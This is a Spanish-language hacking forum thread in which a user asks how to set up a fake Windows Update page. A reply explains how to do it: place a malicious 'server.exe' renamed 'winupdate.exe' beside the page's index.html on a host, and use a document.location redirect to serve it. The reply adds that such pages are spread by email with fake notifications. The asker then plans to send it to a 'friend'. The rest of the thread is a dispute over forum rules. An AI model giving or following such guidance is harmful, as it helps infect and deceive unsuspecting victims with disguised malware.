Jump to content
YOUR-AD-HERE
HOSTING
TOOLS
992Proxy
  • 0

Locked Fake Windows Update Page (ayuda)


roñoso

Question

3 answers to this question

Recommended Posts

  • 0
para no desvirtuar el post de hum .http://level-23.biz/forum/showthread.php?5309-Fake-Windows-Update-Page ,creo este post para que me den una mano en la instalacion

me pueden guiar en la instalacion ?

 

 

hola, no necesita ninguna instalación, solo debes de agregar tu server.exe con el nombre "winupdate.exe" en la misma carpeta donde esta el index.html subido a tu hosting o si le quieres cambiar el nombre de winupdate.exe por otro solo abres el index con el notepad y le cambias aqui el nombre

 

document.location = 'tu_server.exe';

 

estos fakes más que nada se usan para spread por email con una notificacion falsa y cambiando el index a tus necesidades claro xD

Link to comment
Share on other sites

  • 0
sii!! exelente, esta muy bueno , gracias hum ahora voy a ver la forma de mandarselo a un amigo , yo vi por aca en el foro que se podia enviar mails (como vos quieras ,me acuerdo que puse [email protected] ) pero legaban a correo no deseado, bueno muchas gracias

 

saludos

 

amigo hay un boton para dar gracias asi que lee las reglas para que no te pase esto te llevas una infraccion.

Link to comment
Share on other sites

  • 0

sony disculpa que te responda pero me parece que estas equivocado ,si ves yo uso el boton que mencionas siempre ,pero en este caso el compañero hum me da la solucion de mi pedido y aparte me aclara otras dudas y no creo que me lleve a una infraccion por lo que dije .para mi la infraccion esta en decir: (gracias ).etc,etc pero bueno

hace lo tuyo

 

pd: lee las reglas

pd:2 sacame la infraccion

Edited by roñoso
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.